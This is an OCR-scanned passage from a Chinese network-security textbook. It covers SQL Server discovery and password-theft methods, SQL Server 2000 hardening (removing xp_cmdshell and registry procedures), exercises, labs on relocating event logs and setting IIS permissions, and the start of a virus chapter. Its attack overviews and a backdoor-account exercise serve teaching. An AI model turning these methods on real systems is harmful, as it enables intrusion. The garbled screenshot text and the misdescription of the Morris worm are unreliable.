己 的 服务 器 “ 飞 ” 得 太 低 ， 以 至 于 不 能 显示 在 别人 的 雷达 屏幕 上 。 许 多 攻击 者 只 是 因为 高 


@ 
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兴 而 扫描 他 范围 ， 假 定 自己 的 ISP 或 内 部 网 路 被 这 些 人 骚扰 了 ， 那 就 要 做 最 坏 的 打算 。 

现在 评估 SQL Server 被 发 现 的 方法 ， 可 以 通过 网 络 ， 也 可 以 通过 企业 内 部 。 攻 击 者 无 
论 是 把 某 些 卫 范围 作为 目标 ， 还 是 随机 扫描 ， 他 们 发 现 SQL Server 所 使 用 的 工具 都 是 一 
样 的 。 

当 微 软 在 SQL Server 2000 中 引入 多 请 求 能 力 时 ， 就 引入 了 一 个 难题 ， 既然 端口 (除了 
默认 的 请 求 , 它 默 认 监 听 端 口 1433) 是 动态 分 配 的 , 那么 怎样 知道 请 求 名 字 的 用 户 是 如 何 连 
接 到 合适 的 TCP 端口 的 ?微软 通过 在 UDP1434 上 创建 一 个 监听 者 来 解决 这 个 问题 ， 该 方 
法 被 称 为 SQL Server 解决 服务 方案 。 这 个 服务 方案 负责 发 送 包 含 链接 信息 的 响应 包 给 发 送 
特定 请 求 的 客户 。 这 个 包含 有 允许 客户 想得到 的 请 求 的 所 有 信息 ， 包 括 每 个 请 求 的 TCP 端 
口 、 请 求 形式 ， 以 及 服务 器 是 否 集群 等 。 


3.4.2 ”获取 账号 及 扩大 权限 


假定 SQL Server 搜索 是 成 功 的 ， 那 么 现在 有 收集 到 的 瑟 地 址 、 请 求 名 称 以 及 TCP 端 
口 作为 武装 ， 然 后 去 获得 一 些 安全 环境 的 信息 。 可 收集 关于 服务 器 的 信息 ， 比 如 版 本 信息 、 
数据 库 、 表 单 以 及 其 他 的 信息 ， 这 些 将 决定 谁 是 目标 : 是 SQL Server 数据 还 是 操作 系统 。 

一 般 来 说 ， 入 侵 者 可 以 通过 以 下 几 个 手段 来 获取 账号 或 密码 。 

(1) 社会 ( 交 ) 工 程 学 : 通过 欺诈 手段 或 关系 获取 密码 。 

(2) 弱 口 令 扫描 : 该 方法 是 最 简单 的 方法 ， 入 侵 者 通过 扫描 大 量 主机 ， 从 中 找 出 一 两 
个 存在 弱 口 令 的 主机 。 

(3) 探测 包 进行 密码 监听 ， 可 以 通过 Sniffer( 嗅 探 器 ) 来 监听 网 络 中 的 数据 包 ， 从 而 
获得 密码 。 它 对 付 明 文 密码 特别 有 效 ， 如 果 获 取 的 数据 包 是 加 密 的 ， 还 要 涉及 解密 算法 。 

(4) 暴力 破解 SQL 口令 : 密码 终结 者 ， 获 取 密 码 只 是 时 间 问 题 ， 例 如 本 地 暴力 破解 、 
远程 暴力 破解 。 

(5) 其 他 方法 : 例如 在 入 侵 后 安装 木马 或 安装 键盘 记录 程序 等 。 


3.4.3 设置 安全 的 SQL Server 


SQL Server 2000 的 安全 配置 在 进行 SQL Server 2000 数据 库 的 安全 配置 之 前 ， 首 先 用 
户 必须 对 操作 系统 进行 安全 配置 ， 保 证 操作 系统 处 于 安全 状态 。 然 后 对 用 户 要 使 用 的 操作 
数据 库 软件 (程序 ) 进 行 必要 的 安全 审核 ， 比 如 对 ASP、PHP 等 脚本 ， 这 是 很 多 基于 数据 库 
的 Web 应 用 常 出 现 的 安全 隐患 , 对 于 脚本 主要 是 一 个 过 滤 问 题 , 需要 过 滤 一 些 类 似 ,“ ; @ 
/ 等 字符 ， 防 止 破 坏 者 构造 恶意 的 SQL 语句 。 接 着 ， 安 装 SQL Server 2000 后 请 打上 补丁 
spl 以 及 最 新 的 sp2。 

1. 使 用 安全 的 密码 策略 

我 们 把 密码 策略 摆 在 所 有 安全 配置 的 第 一 步 ， 请 注意 ， 很 多 数据 库 账号 的 密码 过 于 简 
单 ， 这 跟 系统 密码 过 于 简单 是 一 个 道理 。 对 于 sa 更 应 该 注意 ， 同 时 不 要 让 sa 账号 的 密码 
写 于 应 用 程序 或 者 脚本 中 。 健 壮 的 密码 是 安全 的 第 一 步 ! SQL Server 2000 安装 的 时 候 ， 如 
果 是 使 用 混合 模式 ， 那 么 就 需要 输入 sa 的 密码 ， 除 非 你 确认 必须 使 用 空 密码 。 这 比 以 前 的 
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版 本 有 所 改进 。 同 时 养 成 定期 修改 密码 的 好 习惯 。 数 据 库 管理 员 应 该 定期 查看 是 否 有 不 符 
合 密码 要 求 的 账号 。 
比如 使 用 下 面 的 SQL 语句 : 


Use master 


Select name,Password from syslogins where password is null 


2. 使 用 安全 的 账号 策略 


由 于 SQL Server 不 能 更 改 sa 用 户 名 称 ， 也 不 能 删除 这 个 超级 用 户 ， 所以， 我 们 必须 对 
这 个 账号 进行 最 强 的 保护 。 当 然 ， 包 括 使 用 一 个 非常 强壮 的 密码 ， 最 好 不 要 在 数据 库 应 用 
中 使 用 sa 账号， 只 有 当 没有 其 他 方法 登录 到 SQL Server 实例 (例如 ， 当 其 他 系统 管理 员 不 
可 用 或 忘记 了 密码 ) 时 才 使 用 sa。 建 议 数据 库 管理 员 新 建立 个 拥有 与 sa 一 样 权 限 的 超级 用 
户 来 管理 数据 库 。 安 全 的 账号 策略 还 包括 不 要 让 管理 员 权限 的 账号 泛滥 。 

SQL Server 的 认证 模式 有 Windows 身份 认证 和 混合 身份 认证 两 种 。 如 果 数 据 库 管 理 员 
不 希望 操作 系统 管理 员 通 过 操作 系统 登录 来 接触 数据 库 的 话 ， 可 以 在 账号 管理 中 把 系统 账 
号 “BUILTIN\Administrators” 删 除 。 不 过 这 样 做 的 结果 是 一 旦 sa 账号 忘记 密码 的 话 ， 就 没 
有 办 法 来 恢复 了 。 很 多 主机 使 用 数据 库 应 用 只 是 用 来 做 查询 、 修 改 等 简单 功能 的 ， 请 根据 
实际 需要 分 配 账号 ， 并 赋予 仅仅 能 够 满足 应 用 要 求 和 需要 的 权限 。 比 如 ， 只 要 查询 功能 的 ， 
那么 就 使 用 一 个 简单 的 public 账号 能 够 select 就 可 以 了 。 

3. 加 强 数据 库 日 志 的 记录 

审核 数据 库 登 录 事 件 的 “失败 和 成 功 ”， 在 实例 属性 中 选择 “安全 性 ”， 将 其 中 的 审 
核 级 别 选 定 为 全 部 ， 这 样 在 数据 库 系 统 和 操作 系统 日 志 里 面 ， 就 详细 记录 了 所 有 账号 的 登 
录 事 件 。 请 定期 查看 SQL Server 日 志 检查 是 否 有 可 疑 的 登录 事件 发 生 ， 或 者 使 用 DOS 
命令 。 


findstr /C:" 登 录 " d:\Microsoft SQL Server\MSSQL\LOG\*.* 


4. 管理 扩展 存储 过 程 

对 存储 过 程 进行 大 手术 ， 并 且 对 账号 调用 扩展 存储 过 程 的 权限 要 慎重 。 其 实在 多 数 应 
中 根本 用 不 到 多 少 系统 的 存储 过 程 ， 而 SQL Server 的 这 么 多 系统 存储 过 程 只 是 用 来 适应 
广大 用 户 需 求 的 ， 所 以 请 删除 不 必要 的 存储 过 程 ， 因 为 有 些 系 统 的 存储 过 程 能 很 容易 地 被 
人 利用 起 来 提升 权限 或 进行 破坏 。 如 果 用 户 不 需要 扩展 存储 过 程 xp_cmdshell 请 把 它 去 掉 ， 
请 使 用 以 下 SQL 语句 : 


use master 


sp_dropextendedproc 'xp_cmdshell' 


xp_cmdshell 是 进入 操作 系统 的 最 佳 捷径 ， 是 数据 库 留 给 操作 系统 的 一 个 大 后 门 。 如 果 
用 户 需要 这 个 存储 过 程 ， 请 用 这 个 语句 将 其 恢复 过 来 。 


sp_addextendedproc 'xp_cmdshell', 'xpsql70.d1ll' 


© 


(> 计算 机 网 络 安全 


归 
六 
7 
‘ 
材 
计 
算 
机 
系 
列 


如 果 用 户 不 需要 ， 请 丢弃 OLE 自动 存储 过 程 (会 造成 管理 器 中 的 某 些 特征 不 能 使 用 )， 
这 些 过 程 包括 如 下 : 


SP _ORCreate Sp OADestroy Sp _ ORGetErrorInfo Sp OAGetProperty 
Sp_OAMethod Sp OASetProperty Sp_OAStop 


去 掉 不 需要 的 注册 表 访 问 的 存储 过 程 ， 注 册 表 存储 过 程 甚 至 能 够 读 出 操作 系统 管理 员 
的 密码 来 ， 如 下 : 


Xp_regaddmultistring Xp regdeletekey Xp regdeletevalue 
Xp_regenumvalues Xp regread Xp regremovemultistring 


Xp_regwrite 


还 有 一 些 其 他 的 扩展 存储 过 程 ， 你 也 最 好 检查 检查 。 在 处 理 存储 过 程 的 时 候 ， 请 确认 
一 下 ， 避 免 造成 对 数据 库 或 应 用 程序 的 伤害 。 


5. 使 用 协议 加 密 


SQL Server 2000 使 用 的 Tabular Data Stream 协议 来 进行 网 络 数据 交换 ， 如 果 不 加 密 的 
话 ， 所 有 的 网 络 传输 都 是 明文 的 ， 包 括 密码 、 数 据 库 内 容 等 ， 这 是 一 个 很 大 的 安全 威胁 。 
能 被 人 在 网 络 中 截获 到 他 们 需要 的 东西 ， 包 括 数 据 库 账号 和 密码 。 所 以 ， 在 条 件 允 许 的 情 
况 下 ， 最 好 使 用 SSL 来 加 密 协议 ， 当 然 ， 用 户 还 需要 一 个 证 书 来 支持 。 

6. 不 要 让 人 随便 探测 到 你 的 TCP/IP 端口 


默认 情况 下 ，SQL Server 使 用 1433 端口 监听 ， 很 多 人 都 说 SQL Server 配置 的 时 候 要 
把 这 个 端口 改变 ， 这 样 别人 就 不 能 很 容易 地 知道 使 用 的 什么 端口 了 。 可 惜 ， 通 过 微软 未 公 
开 的 1434 端口 的 UDP 探测 ， 可 以 很 容易 知道 SQL Server 使 用 的 什么 TCP/IP 端口 。 不 过 
微软 还 是 考虑 到 了 这 个 问题 ， 毕 竞 公开 而 且 开 放 的 端口 会 引起 不 必要 的 麻烦 。 在 实例 属性 
中 选择 TCP/IP 协议 的 属性 。 选 择 隐藏 SQL Server 实例 。 如 果 隐 藏 了 SQL Server 实例 ， 
则 将 禁止 对 试图 枚 举 网 络 上 现 有 的 SQL Server 实例 的 客户 端 所 发 出 的 广播 做 出 响应 。 这 
样 ， 别 人 就 不 能 用 1434 来 探测 用 户 的 TCP/IP 端口 了 (除非 用 Port Scan)。 


7. 修改 TCP/IP 使 用 的 端口 


请 在 上 一 步 配 置 的 基础 上 , 更 改 原 默认 的 1433 端口 。 在 实例 属性 中 选择 网 络 配置 中 的 
TCP/IP 协议 的 属性 ， 将 TCP/IP 使 用 的 默认 端口 变 为 其 他 端口 。 


8. 拒绝 来 自 1434 端口 的 探测 

由 于 1434 端口 探测 没有 限制 ， 能 够 被 别人 探测 到 一 些 数据 库 信息 ， 而 且 还 可 能 遭 到 
DoS 攻击 让 数据 库 服 务 器 的 CPU 负荷 增 大 , 所 以 对 Windows 2000 操作 系统 来 说 , 在 IPSec 
过 滤 拒 绝 掉 1434 端口 的 UDP 通信 ， 可 以 尽 可 能 地 隐藏 用 户 的 SQL Server。 

9. 对 网 络 连接 进行 IP 限制 

SQL Server 2000 数据 库 系 统 本 身 没有 提供 网 络 连接 的 安全 解决 办 法 ， 但 是 Windows 
2000 提供 了 这 样 的 安全 机 制 : 使 用 操作 系统 自己 的 PSec 可 以 实现 卫 数据 包 的 安全 性 。 请 


对 TP 连接 进行 限制 ， 只 保证 自己 的 下 能 够 访问 ， 也 拒绝 其 他 瑟 进行 的 端口 连接 ， 把 来 自 
网 络 上 的 安全 威胁 进行 有 效 的 控制 。 


小 结 


本 章 主要 介绍 了 拒绝 服务 攻击 的 概念 及 原理 ， 常 见 的 DoS 攻击 种 类 及 防护 ， 基 于 漏洞 
入 侵 的 防护 方法 ，SQL 数据 库 安全 原理 及 SQL Server 攻击 的 防护 等 内 容 ， 简 单 介绍 了 基于 
电子 邮件 服务 与 Telnet 攻击 的 防护 方法 、SQL 服务 器 的 发 展 、 信 息 资源 的 收集 等 知识 ， 最 
后 介绍 了 设置 安全 的 SQL Server 的 相关 知识 。 通 过 本 章 的 学 习 ， 让 学 生 掌握 拒绝 服务 攻击 
I 防范 方法 ， 基 于 漏洞 入 侵 的 防护 方法 ， 以 及 SQL 数据 库 安全 设置 。 


本 章 习 题 
一 、 填 空 题 
1. 拒绝 服务 攻击 DoS 按 攻击 目标 可 以 分 为 和 
2. 拒绝 服务 攻击 DoS 按 受 害 者 类 型 可 分 为 和 
3. 拒绝 服务 攻击 DoS 按 攻击 方式 可 分 为 s 和 5 
4. 常见 的 DoS 攻击 有 上 和 
5. DDoS 所 包含 的 三 个 层次 是 > 
6. 常见 的 IIS 漏洞 有 和 
7. 增强 注册 表 安 全 性 的 方法 是 和 
8. 数据 模型 的 两 种 类 型 是 和 
二 、 选 择 题 
1. 攻击 者 通过 使 用 软件 破坏 网 络 、 系 统 资源 和 服务 属于 (  ) 攻 击 。 
A. 硬件 攻击 B. 软件 攻击 C. 主机 型 攻击 D. 应 用 性 攻击 
2. 攻击 者 试图 消耗 目标 主机 的 网 络 带 宽 、 内 存 等 合法 资源 属于 ( ) 攻 击 。 
A. 主机 型 攻击 。 B. 软件 攻击 C. 资源 消耗 D. 物理 破坏 
3.” 采用 三 次 握手 的 方法 的 攻击 类 型 是 ( j: 
A. Land 程序 攻击 B. SYN flood 攻击 
C.IP 欺 骗 D. 泪 滴 攻 击 
4 攻击 者 可 以 利用 ( ”) 漏 洞 获取 Web 服务 器 的 System 权限 来 访问 远程 系统 。 
A. .ida&.idq 漏洞 B. .printer 漏洞 
C. WebDAV 漏洞 D. Unicode 漏洞 
5. 入 侵 者 可 以 利用 ( ， ) 漏 洞 以 Local System 的 权限 在 主机 上 执行 命令 。 
A. .ida&.idq 漏洞 B. .printer 漏洞 
C. WebDAV 漏洞 D. Unicode 漏洞 
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( “” ) 漏 洞 使 得 电子 邮件 服务 器 容易 受到 缓冲 区 溢出 等 类 型 的 攻击 。 

A. DoS 攻击 B. IMAP 和 POP 漏洞 

C. 系统 漏洞 D. 特洛伊 木马 

入 侵 者 获取 SQL Server 的 账号 密码 的 方法 有 ( )。( 多 选 ) 

A. 弱 口 令 扫描 B. 暴力 破解 C. 木马 D. 社会 工程 学 
由 数据 库 角 色 来 对 指定 数据 库 中 的 对 象 定义 访问 权限 属于 ( 。”) 安 全 层次 。 
A. 第 0 级 B. 第 一 级 CC 第 二 缀 D. 第 三 级 


、 简 答题 : 


什么 是 拒绝 服务 ?常见 的 拒绝 服务 有 哪些 ? 

举 个 拒绝 服务 的 实例 ， 并 通过 实验 验证 。 

如 何 防守 IIS 入 侵 ? 并 简 述 IIS 的 安全 解决 方案 。 

注册 表 是 Windows 操作 系统 的 核心 ， 但 是 在 默认 情况 下 ， 所 有 基于 Windows 系 


统 的 注册 表 在 网 络 上 都 可 以 被 访问 到 。 了 解 这 一 点 的 黑客 完全 可 以 利用 这 个 安全 漏洞 来 对 
你 公司 的 计算 机 系统 进行 攻击 ， 试 问 ， 如 何 禁 止 对 注册 表 的 远程 访问 ? 


5.” 简 述 Telnet 的 入 侵 方 式 。 如 何 才能 抵御 Telnet 入 侵 ? 

6. 如 何在 远程 主机 上 建立 后 门 账号 ? 

7. 局域网 中 的 MSSQL 服务 器 在 什么 情况 下 能 够 被 SQL ServerSniffer 噢 探 到 ? 应 该 
如 何 防 范 ? 

实 训 一 ”系统 日 志 的 防护 

1. 实 训 目的 

掌握 系统 注册 表 基 本 维护 。 

掌握 日 志清 除 的 防范 方法 。 

2. 实 训 要 求 

计算 机 一 台 ， 要 求 安装 Windows 2000 操作 系统 。 

3. 实 训 步骤 


(1) 首先 找 出 日 志文 件 默认 位 置 ， 以 管理 员 身份 登录 系统 ， 选 择 “开始 ”一 “运行 ” 
命令 ， 在 弹出 的 系统 运行 对 话 框 中 ， 输 入 字符 串 命 令 “compmgmtmsc”， 单 击 “确定 ” 按 
钮 后 打开 服务 器 系统 的 计算 机 管理 窗口 ， 如 图 3-9 所 示 。 

(2) 其 次 在 该 管理 窗口 的 左 侧 显示 窗 格 中 ， 用 鼠标 逐一 展开 “系统 工具 ”一 “事件 查 
看 器 ”分 支 项 目 ， 在 “事件 查看 器 ”分 支 项 目下 面 我 们 会 看 到 “系统 ”、“ 安 全 性 ”以 及 


“应 上 


程序 ”3 个 选项 。 要 查看 系统 日 志文 件 的 默认 存放 位 置 时 ， 右 击 “ 事 件 查看 器 ”分 


支 项 目下 面 的 “应 用 程序 ”选项 ， 从 弹出 的 快捷 菜单 中 选择 “属性 ”命令 。 在 该 窗口 的 常 
规 标签 页 面 中 ， 我 们 可 以 看 到 本 地 日 志文 件 的 默认 存放 位 置 为 “C:WINDOWS\system32\ 
config\AppEvent.Evt”， 如 图 3-10 所 示 。 
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3-9 计算 机 管理 窗口 


应 用 程序 属性 


| 星 示 名 称 由 :| 国 通 归 
|C: \¥INDOWS\systen32\confie\AppEvent. Evt 


256.0 到 (262,144 子 节 ) 

2006 年 11 月 7 日 星期 二 1:16:00 
2009 年 4 月 20 日 星期 一 11:59:40 
2009 年 4 月 20 日 星期 一 0:00:00 


最 大 日 志文 件 大 小 旭 : 512 守 十 


当 这 到 | 最 大 的 日 志 大 小 时 
加 按 志 要 改写 事件 Q) 
回 改 写 久 于 四 


°° ER 


口 使 用 低速 连接 @@) 河 队 日志 CC) 


CE JL ww ] | sane 
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(3) 做 好 日 志文 件 挪移 准备 ， 为 了 让 服务 器 的 日 志文 件 不 被 外 人 随意 访问 ， 我 们 必须 
让 日 志文 件 挪移 到 一 个 其 他 人 根本 无 法 找到 的 地 方 ， 例 如 可 以 到 E 分 区 的 一 个 “Ei\aaa\” 
目录 下 面 创建 一 个 “bbb” 目 录 。 

(4) 正式 挪移 日 志文 件 ， 将 对 应 的 日 志文 件 从 原始 位 置 直接 复制 到 新 目录 位 置 
“E:\aaa\bbb\” 下 。 

(5) 修改 系统 注册 表 做 好 服务 器 系统 与 日 志文 件 的 关联 ， 执 行 “ 开 始 ” 一 “运行 ” 命 
令 ， 在 弹出 的 “运行 ”对 话 框 中 ， 输 入 注册 表 编 辑 命令 “regedit”， 按 回 车 键 后 ， 打 开 系 
统 的 注册 表 编 辑 窗口 ; 用 鼠标 双击 “HKEY LOCAL MACHINE ”注册 表 子 键 ， 在 随后 展 
开 的 注册 表 分 支 下 面 一 次 选择 “SYSTEM”、“CurrentControlSet”、“Service” 、“Eventlog” 
项 目 ， 在 对 应 “Eventlog” 项 目下 面 我 们 会 看 到 “System”、“Security”、“Application” 
3 个 选项 ， 如 图 3-11 所 示 。 
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注册 专 编 回回 
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(6) 在 对 应 “System” 注 册 表 项 目的 右 侧 显示 区 域 中 ， 用 鼠标 双击 “File” 键 值 ， 弹 出 
如 图 3-12 所 示 的 数值 设置 对 话 框 ， 然 后 在 “数值 数据 ”文本 框 中 ， 输 入 
“E:\aaa\bbb\SysEvent.Evt” 字 符 串 内 容 ， 也 就 是 输入 系统 日 志文 件 新 的 路 径 信 息 ， 最 后 单 
击 “ 确 定 ” 按 钮 ， 同 样 的 ， 我 们 可 以 将 “Security”、“Application ”下面 的 “File” 键 值 一 
次 修改 为 “E:vaaa\bbb\SecEvent Evt”、“E:\aaa\bbb\AppEventEvt”， 最 后 按 一 下 键盘 中 的 


F5 功能 键 刷新 一 下 系统 注册 表 ， 就 能 使 系统 日 志文 件 的 关联 设置 生效 了 。 


固 minlwimeile 
辆 molwioem 


上 四国 EvatSyxte 
et 数值 汶 据 0); 


济济 芝 粮 车 ” 填 潍 开 侣 上 革 册 到 当 到 
ss 
四 
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我 的 电脑 \HKET_LOCAL_IACHIIE\STSTEN\CurrentCentrolSet\Servicas\Eventlos\Sacurity 


从 信 未 设置 ) 
XSystanBootk\Systen32\d 
Ox000001O1 (257) 

和 SystemFootW\Systen32vd 
0Dx00080000 (S24268) 
Security 
DOx00000001 (1) 
Ox00033680 (604600) 
D1 00 14 60 tm 00 00 or 
Speolar Serurity 如 ceur| 
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实 训 二 ”1IS Web 服务 器 的 权限 设置 


1. 实 训 目的 

掌握 NTFS 文件 系统 本 身 的 权限 设置 。 
掌握 TS 权限 设置 。 

2. 实 训 要 求 

安装 Windows 2003 server 操作 系统 计算 机 。 
3. 实 训 步骤 


(1) ASP、PHP、ASP.NET 程序 所 在 目录 的 权限 设置 。 

如 果 这 些 程序 是 要 执行 的 ， 那 么 需要 设置 “ 读 取 ” 权 限 ， 如 图 3-13 所 示 ， 并 且 设 置 执 
行 权限 为 “ 纯 脚本 ”。 不 要 设置 “ 写 入 ”和 “脚本 资源 访问 ”， 更 不 要 设置 执行 权限 为 “ 纯 
脚本 和 可 执行 程序 ”， 如 图 3-14 所 示 。 


jelx_page 尾 性 21xl 
常规 | 共享 ”安全 |web 共享 | 自 定义 | 


SVCTAG-SIONDEX\Administrators) 


GR chEATOR owwER 
a s 00! Svers Sannex\iis 001) | 
srsTEn 
RUsers (cycTAc-smnnizxvUsers) 
is_001 的 权限 开 ) 区 评 拒绝 
完全 控制 口 口 当 
修改 口 口 
访 职 和 运行 口 口 
列 出 文件 严 目 录 口 口 
读 :1 回 口 
写 口 口 而 
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虚拟 目录 | 文档 “| 目 
此 这 源 的 内 容 未 自 - 
6 EE 
个 另 一 癌 计算 机 上 的 共享 @) 
玉 重 定 声 到 WE 人 
FE iD 
厂 丢 本 次 源 沪 问 全 ) 三 记录 访问 GD | 
扩 束 职 @) 厂 系 3 嘲 源 中 | 
C SA 
厂 目录 浏览 四 ) 
应 用 程 序 设置 
克 用 三友 名 时 ) 
开始 位 置 
执行 权限 四- 
应 用 程序 泪 0 
取 注 aI 姑且 
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(全 >》> 计 算 机 网 络 安全 


NTFS 权限 中 不 要 给 IS_WPG 用 户 组 和 Internet 来 宾 账号 设置 写 和 修改 权限 。 如 果 有 
一 些 特殊 的 配置 文件 (而 且 配 置 文件 本 身 也 是 ASP、PHP 程序 )， 则 需要 给 这 些 特定 的 文件 
配置 NTFS 权限 中 的 Intemet 来 宾 账 号 ASPNET 程序 是 IS_WPG 组 ) 的 写 权 限 , 而 不 要 配 
置 IS 属性 面板 中 的 “ 写 入 ”权限 。 

(2) 上 传 目 录 的 权限 设置 。 

网 站 上 可 能 会 设置 一 个 或 几 个 目录 允许 上 传 文件 ， 上 传 的 方式 一 般 是 通过 ASP、PHP、 
ASPNET 等 程序 来 完成 。 一 定 要 将 上 传 目 录 的 执行 权限 设 为 “无 ”， 这样 即 使 上 传 了 ASP、 
PHP 等 脚本 程序 或 者 exe 程序 ， 也 不 会 在 用 户 浏览 器 里 就 触发 执行 。 如 图 3-15 所 示 。 


目录 | 文档 “| 目录 安全 性 | JTTP 头 | 自 定义 错误 | AsF ET| 
此 再 沽 的 内 容 条目- 


= 天 二 百村 


FE SHH FE 
二 A wD - 

tC): [resins 

厂 靶 本 资源 访问 厂 记录 访问 四 

克 读 职 0) 厂 素 3 隘 源 四 

三 三 Xe 

厂 目录 浏览 四) 

语 用 程序 设 生 

和 应 用 程 计 名 轿 ) = 创 津 三 ) 

B43) 
执行 权限 呈 ): 民 | [ze | 


应 用 程序 窟 六 
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(3) Access 数据 库 所 在 目录 的 权限 设置 。 
IIS 用 户 一 般 将 Access 数据 库 改 名 ( 改 为 asp 或 者 aspx 后 级 等 ), 或 者 放 在 发 布 目 录 之 外 
的 方法 来 避免 浏览 者 下 载 他 们 的 Access 数据 库 。 此 时 只 需要 将 Access 所 在 目录 (或 者 该 文 


件 ) 的 “ 读 取 ” 


潼 洲 车 粮 半 ”车 潍 R 侣 时 出 到 灌 对 


不 必 担 心 这 样 程序 会 无 法 读 取 和 写 入 你 的 Access 数据 库 ， 


、“ 写 入 ”权限 都 去 掉 即 可 。 如 图 3-16 所 示 。 


目录 ”| 文档 | 目录 安全 性 | MTTP 头 | 自 定义 覆 误 | AsP_ ET| 
此 资源 的 内 容 末 自 - 


个 多 人 台 讨 犁 所 十 的 从 之 
个 重 定 向 到 ULQD 
本 地 路 径 CC) : Er 
厂 采 本 地 预 访 后 人 0 图 四 
这 取 厂 系 纺 源 吕 ) 
厂 写 入 中 
厂 目录 浏览 
应 用 程序 设置 
应 用 程 计 名册 ] Fe= 创建 开 ) 
开始 位 置 : ke 
机 是 (7 
执行 权限 E) 区 ”可 [El 
应 用 程序 入 00 [TFT 一 EL 
[3 到 少 [ET 天 助 
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因 


是 NTFS 上 Internet 来 宾 账 号 或 IS_WPG 组 账号 的 权限 ， 只 要 将 这 些 用 户 的 权限 设置 为 可 
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读 可 写 就 完全 可 以 保证 你 的 程序 能 够 正确 运行 了 。 

(4) 其 他 目录 的 权限 设置 。 

网 站 下 有 纯 图 片 目录 、 纯 html 模板 目录 、 纯 客户 端 js 文件 目录 或 者 样式 表 目 录 等 ， 这 
些 目录 只 需要 设置 “ 读 取 ” 权 限 即 可 ， 执 行 权限 设 成 “无 ” 即 可 。 其 他 权限 一 概 不 需要 设 
置 。 如 图 3-17 所 示 。 


ET 了 耻 x| 
常规 | 共享 安全 | veb 共享 | 目 定义 | 


on 


特别 权限 或 高 级 设置 ， 请 单 击 “ 高 级 ”. 


职 测 | 应用) 
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第 4 章 计算 机 病毒 与 木马 


【本 章 要 点 】 
通过 本 章 的 学 习 ， 可 以 了 解 计算 机 病毒 的 定义 。 掌握 计 算 机 病毒 特征 以 及 检测 、 防 范 
等 技术 。 初 步 了 解 木马 攻击 的 技术 、 特 点 。 


4.1 计算 机 病毒 概述 


计算 机 病毒 是 一 个 程序 、 一 段 可 执行 码 。 它 们 就 像 生物 病毒 一 样 ， 有 其 独特 的 复制 能 
力 ， 可 以 很 快 地 蔓延 ， 又 常常 难以 根除 。 它 们 能 把 自身 附着 在 各 种 类 型 的 文件 上 ， 当 文件 
被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ， 就 随同 文件 一 起 蔓延 开 来 。 

除 复制 能 力 外 ， 某 些 计算 机 病毒 还 有 其 他 一 些 共同 特性 ， 一 个 被 污染 的 程序 能 够 传送 
病毒 载体 。 

可 以 从 不 同 角度 给 出 计算 机 病毒 的 定义 。 

(1) 通过 磁盘 、 磁 带 和 网 络 等 作为 媒介 传播 扩散 ， 能 “传染 ”其 他 程序 的 一 种 程序 。 

(2) 能 够 实现 自身 复制 且 借 助 一 定 的 载体 存在 的 具有 潜伏 性 、 传 染 性 和 破坏 性 的 程序 。 

(3) 是 一 种 人 为 制造 的 程序 , 它 通过 不 同 的 途径 潜伏 或 寄生 在 存储 媒体 (如 磁盘 、 内 存 ) 
或 程序 里 ， 当 某 种 条 件 或 时 机 成 熟 时 ， 它 会 自生 复制 并 传播 ， 使 计算 机 的 资源 受到 不 同 程 
度 的 破坏 。 

计算 机 病毒 同 生物 病毒 相似 之 处 是 能 够 侵入 计算 机 系统 和 网 络 ， 危 害 正常 工作 的 “ 病 
原 体 ”。 它 能 够 对 计算 机 系统 进行 各 种 破坏 ， 同 时 能 够 自我 复制 ， 具 有 传染 性 。 

与 生物 病毒 不 同 的 是 ， 儿 乎 所 有 的 计算 机 病毒 都 是 人 为 地 故意 制造 出 来 的 ， 有 时 一 旦 
扩散 出 来 后 连 编者 自己 也 无 法 控制 ， 因 此 它 已 经 不 是 一 个 简单 的 纯 计算 机 学 术 问题 ， 而 是 
一 个 严重 的 社会 问题 。 

几 年 前 ， 大 多 数 类 型 的 病毒 主要 是 通过 软盘 传播 ， 但 现在 ， 因 特 网 引入 了 新 的 病毒 传 
送 机 制 ， 随 着 现在 电子 邮件 被 用 作 一 个 重要 的 企业 通信 工具 ， 病 毒 就 比 以 往 任何 时 候 都 要 
扩展 得 快 。 附 着 在 电子 邮件 信息 中 的 病毒 ， 仅 仅 在 几 分 钟 内 就 可 以 浸染 整个 企业 ， 让 公司 
每 年 在 生产 损失 和 清除 病毒 开销 上 花费 数 百 万 美元 。 

今后 任何 时 候 病毒 都 不 会 很 快 地 消失 。 按 美国 国家 计算 机 安全 协会 发 布 的 统计 资料 ， 
已 有 超过 一 万 种 病毒 被 辨认 出 来 ， 而 且 每 个 月 又 产生 两 百 多 种 新 型 病毒 。 为 了 安全 ， 大 部 
分 机 构 必须 常规 性 地 对 付 病毒 的 突然 爆发 ， 可 以 说 没有 一 个 使 用 多 台 计 算 机 的 机 构 能 对 病 
毒 免疫 。 


4.1.1 计算 机 病毒 的 起 源 


计算 机 病毒 的 起 源 ， 到 现在 还 没有 一 个 为 大 家 所 公认 的 确切 说 法 。 尽 管 如 此 ， 对 于 计 
算 机 病毒 的 发 源 地 ， 大 家 都 一 致 认为 是 美国 。 
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关于 计算 机 病毒 的 起 源 现在 有 几 种 说 法 ， 但 还 没有 一 个 被 人 们 所 确认 ， 也 没有 实质 性 
的 论述 予以 证 明 。 下 面 将 儿 种 起 源 说 简单 介绍 一 下 。 

1) ”科学 幻想 起 源 说 

1975 年 ， 美 国 科普 作家 约翰 。 布 鲁 勒 尔 写 了 一 本 名 为 《冲击 波 骑士 》 的 书 ， 该 书 第 一 
次 描写 了 在 信息 社会 中 ， 计 算 机 作为 正义 和 政 恶 双方 斗争 的 工具 的 故事 。 

2) “恶作剧 起 源 说 

恶作剧 者 大 都 是 那些 对 计算 机 知识 和 技术 非常 感 兴趣 的 人 ， 并 且 特 别 热衷 于 那些 别人 
认为 是 不 可 能 做 成 的 事情 。 这 些 人 或 是 要 显示 一 下 自己 在 计算 机 知识 方面 的 天 资 ， 或 是 要 
报复 一 下 别人 或 公司 。 前 者 是 无 恶意 的 ， 所 编写 的 病毒 也 大 多 不 是 恶意 的 ， 只 是 显示 一 下 
自己 的 才能 以 达到 炫耀 的 目的 。 例 如 ， 美 国 网 络 蠕虫 病毒 的 编写 者 英里 斯 实际 上 就 属于 此 
类 恶作剧 者 ， 因 为 在 他 编写 这 个 旨 在 渗透 到 美国 国防 部 的 计算 机 病毒 之 时 ， 也 没有 考虑 到 
这 种 计算 机 病毒 会 给 美国 带 来 巨大 的 损失 。 而 后 者 则 大 多 是 恶意 的 报复 ， 想 从 受 损 失 一 方 
的 痛苦 中 取得 乐趣 ， 以 泄 私 愤 。 

